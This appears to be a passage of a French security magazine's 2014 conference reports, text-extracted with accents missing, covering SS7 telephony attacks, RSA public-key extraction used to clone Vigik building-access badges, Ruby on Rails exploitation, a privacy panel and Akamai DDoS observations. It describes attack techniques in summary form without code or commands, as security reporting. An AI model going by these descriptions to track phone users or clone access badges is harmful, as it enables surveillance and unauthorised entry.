Une fois la partie thorique acheve, des scnarios dat-taque concrets ont t illustrs. Aprs avoir ralis une reconnaissance des diffrents quipements sur le rseau dun oprateur, les chercheurs de P1 ont ainsi t capables de localiser la position des utilisateurs connects ce r-seau tlphonique. Ils ont de plus t capables dmettre des appels ou des SMS depuis le numro de leur choix, lchelle nationale et internationale

En fin de confrence, des solutions de mitigation ont t prsentes. Nanmoins, celles-ci sont encore imparfaites et peuvent tre contournes.

A common weakness in RSA signatures: extracting pu-blic keys from communications and embedded devicesRenaud Lifchitz

+Slideshttp://2014.hackitoergosum.org/slides/day3_A_com-mon_weakness_in_RSA_signatures:extracting_public_keys_from_communications_and_embedded_devices_Re-naud_Lifchitz_hes2014.pdf

Lors de cette confrence, le franais Renaud Lifchitz, consul-tant chez Oppida, nous a prsent des mthodes dextrac-tion de la cl publique en analysant des signatures de mes-sages.En effet, il peut arriver malgr son nom que la cl publique ne soit pas publie (communications entre terroristes, cl


36

embarque au sein dun quipement ferm, etc.).

Renaud Lifchitz a tout dabord rappel le fonctionnement de la cryptographie asymtrique, dans son cas lalgorithme RSA, ainsi que les diffrentes mthodes actuelles connues pour factoriser de grands nombres entiers (recherche de petits facteurs dans de grands nombres ou recherche de grands facteurs dans de petits nombres).Il a ensuite rappel la construction dune signature crypto-graphique et dmontr comment il tait possible dextraire une cl publique en ne possdant que deux messages ini-tiaux et leurs signatures.

Si la prsentation semblait trs thorique, il a ensuite mon-tr une application pratique de cette vulnrabilit sur le badge Vigik. Ce badge permet aux agents des services na-tionaux (La Poste, EDF, France Telecom, etc.) daccder aux immeubles.

Ce badge nest valable que temporairement dans le temps et doit tre rinitialis rgulirement. Les institutions publiques possdent une cl prive qui va signer un mes-sage contenu au sein du badge. Les lecteurs contiennent les cls publiques des diffrentes entreprises et vrifient la validit de la signature.

Aprs avoir revers le fonctionnement des badges, Renaud a t capable dextraire leur contenu (signatures RSA) et de cloner les diffrents badges. En rutilisant la vulnrabilit prcdemment identifie, il a de plus t capable diden-tifier les cls publiques de chacun des organismes (France Telecom, La Poste, etc.)

Ruby on Rails exploitation and effective backdooringJoernchen of Phenoelit

Joernchen of Phenoelit a conclu cette dition de la HES en nous prsentant des vulnrabilits lies au framework web Ruby on Rails , bas sur le langage de programmation Ruby.

Joernchen a commenc par rappeler le fonctionnement de Ruby on Rails, larchitecture MVC utilise par le framework et larborescence dun projet standard.

Il nous a ensuite prsent les vulnrabilits classiques ren-contres sur cet environnement : labsence de contrles et dassainissement sur les paramtres (comme dans beau-coup dautres langages) pouvant mener diffrents types dinjection (SQL, code, etc.). De plus, le framework prsente aussi diffrentes vulnrabilits au niveau de la gestion et du traitement des sessions (sessions persistantes dune connexion lautre, injection de code d un mauvais trai-tement des cookies de session, etc.)

Lensemble de la prsentation sest appuy sur des mi-ni-exemples de chacun de ces cas.

HES


37

GsDays

Confrence plnire

La Confrence plnire accueillait Alain Juillet, Prsident du CDSE (Club des Directeurs de Scurit des Entreprises) et Patrick Chambet (Responsable du Centre de Scurit Groupe, C2S - Groupe Bouygues).Elle tait anime par Jrme Saiz, Rdacteur en Chef de Qualys Magazine.

Cette confrence avait pour ambition de rpondre la question : Protection des liberts individuelles et respect de la vie prive : peut-on encore y croire ?

Plusieurs sujets ont t abords, notamment les rvla-tions de lancien consultant Edward Snowden, linternet des objets, mais galement lexploitation de failles de scuri-t par des rseaux de cybercriminels, ladoption de la Loi de Programmation Militaire ou encore de celle relative la Golocalisation. Nous vous proposons ici un retour sur les principaux sujets qui ont marqu cette confrence.

Le dbat a tout dabord port sur les impacts des publica-tions dEdward Snowden pour la scurit en entreprise. Les intervenants voient deux priodes distinctes. Celle avant les rvlations et celle daprs.

Avant celles-ci, on supposait que certaines agences pro-cdaient des coutes massives de la population, mais aussi des chefs dtat et membres des gouvernements. On se doutait aussi que le centre de donnes de la NSA en construction en Utah tait un signe des capacits impor-tantes de lagence. ce titre, en 2013, Forbes estimait de 3 12 exabytes (millions de tera-octets) sa capacit de stoc-kage. Les capacits de lagence suscitaient ainsi tous les fantasmes des professionnels.

On tait cependant trs loin des faits. Nous navions au-cune ide des moyens utiliss, des volumes enregistrs et de la crativit de lagence pour nuire la vie prive des Internautes. Ces rvlations ont montr que ce que certains appelaient de la paranoa tait bien rel. Les agences de renseignements nont aujourdhui presque aucune limite.

Pour Alain Juillet et Patrick Chambet, cela dmontre le be-soin de nommer un Responsable de la Scurit des Sys-tmes dInformation en entreprise. Et limpact sest vite fait ressentir, on a pu observer une explosion de lutilisation du protocole HTTPS pour le chiffrement des pages web, ainsi que du chiffrement S-MIME pour les emails.

Ces rvlations nont pas uniquement touch les profes-sionnels de la scurit. Les utilisateurs ont aussi t sensibi-liss de facto par les mdias grands publics. Les spcialistes craignaient dailleurs que ce soit phmre et que des com-portements dangereux rapparaissent.

La conversation a ensuite volu vers linternet des objets, une grande proccupation lheure actuelle.

Aujourdhui, lorsque nous envoyons des donnes sur Inter-net, il sagit dune action choisie. lavenir ce ne sera pro-bablement plus le cas. Les prmices sen font sentir ds prsent. En effet, certains vhicules sont capables de com-muniquer des donnes techniques avec leur fabricant. Lob-jectif annonc tant damliorer la qualit des vhicules en comprenant mieux les sources de problmes. Nanmoins, les constructeurs peuvent connatre nimporte quelle don-ne des utilisateurs, tels que leur localisation, leur vitesse moyenne et maximale, ainsi que leurs habitudes.

> Confrences scurit

par Etienne BAUDIN


38

Au CES de Las Vegas taient prsents les premiers objets connects. Ces derniers allaient de la balance, au rfrig-rateur. La proccupation est qu lavenir, il ne sera plus possible de choisir les donnes qui seront ainsi mises en ligne. Tous nos objets de la vie courante seront connects et pourront nous apporter divers services en envoyant sur le web nos donnes personnelles.

La seconde grande proccupation lie ces systmes est leur scurit. Bruce Schneier lindiquait rcemment dans un billet publi sur son blog. Dune part, ces systmes com-municants ne bnficient gnralement pas de mises jour. Dautres parts, il nest pas rare de sapercevoir que les systmes embarqus sont vulnrables, voire mme dj exploits alors mme quils viennent dtre achets. Selon Schneier, le problme provient de la chaine de fabrication qui ne prend pas du tout en compte les problmatiques de scurit. La situation actuelle serait pire que dans les annes 1990 lorsque les logiciels et les systmes dexploi-tation contenaient des failles de scurit critiques particu-lirement difficiles corriger. titre dexemple, des rfrig-rateurs connects, ou autres webcams autonomes auraient dj t impliqus dans certaines attaques.

Pour les deux intervenants, cest donc ds aujourdhui quil faut traiter ces problmatiques avant quelles ne nous sub-mergent. Il faut que la notion de respect de la vie prive soit intgre au mme titre que laccent mis sur les nouvelles fonctionnalits et les promesses de ces nouveaux outils.

Cest sur ces diffrentes problmatiques, qui montrent une vision pessimiste de la situation actuelle que les Global Se-curity Days 2014 ont t lancs.

War Stories from the CloudEmmanuel Mac, Akamai Technologies

+Slideshttp://www.globalsecuritymag.fr/fichiers/gsdays2014/FICHIERS/PRESENTATION/Presentation-AKAMAI.pdf

Akamai est une socit amricaine qui met disposition des serveurs de cache pour les entreprises. Retour sur plu-sieurs attaques par dni de service qui ont t observes par Akamai.

En 2012, suite la publication dune vido amricaine an-ti-islam, lopration Ababil a t lance. Dimportants dnis de service distribus ont ainsi t raliss sur des banques notamment. Cette vague dattaque a dur environ un an.

La premire phase de cette attaque tait une attaque par rflexion DNS. Elle a dur environ deux mois. Il sagissait dune attaque applicative, limite sur la couche 7 du mo-dle OSI.

La seconde phase a eu lieu en janvier. Pour les quatre banques cibles, Akamai avait pu dcharger le trafic sans impact rel sur les sites de leurs clients.

La troisime phase a dmarr dbut mars. Un pic de 4 mil-lions de requtes par minute a pu tre observ, soit 70 fois

le trafic normal. Akamai russissait galement prserver le volume de donnes envoy au site origine.

La dernire phase a eu lieu fin juillet. Des pics de 4,4 mil-lions de requtes HTTP par minute ont pu tre observs. Linfrastructure DNS avait aussi t cible.

Akamai a observ lan dernier des attaques sophistiques et importantes. Daprs son exprience, lentreprise a rete-nu que les attaques sont plus fortes et plus rapides quau-paravant. Elles sattaquent des couches non protges telles que les couches 3 ou 7 du modle OSI.

La charte informatique face aux nouveaux usages en entrepriseFrdric Connes et Amlie Paget, Herv Schauer Consultants

+Slideshttp://www.globalsecuritymag.fr/fichiers/gsdays2014/FI-CHIERS/CONFERENCE/Conf-Frederic-Connes+Amelie-PAGET.pdf

Frdric Connes et Amlie Paget, deux consultants travail-lant chez HSC ont prsent lvolution de la charte informa-tique en entreprise.

En effet, il est important de dfinir une charte en accord avec lapparition des nouveaux usages de loutil informa-tique. Que ce soit le BYOD, le Cloud, les rseaux sociaux ou encore la mobilit, il est ncessaire dencadrer leur dploie-ment pour assurer la maitrise du Systme dInformation.


39

Selon HSC, afin de disposer dune charte informatique mo-derne, il est important de sp

xmco actusecu 37 tests intrusion sap

Documents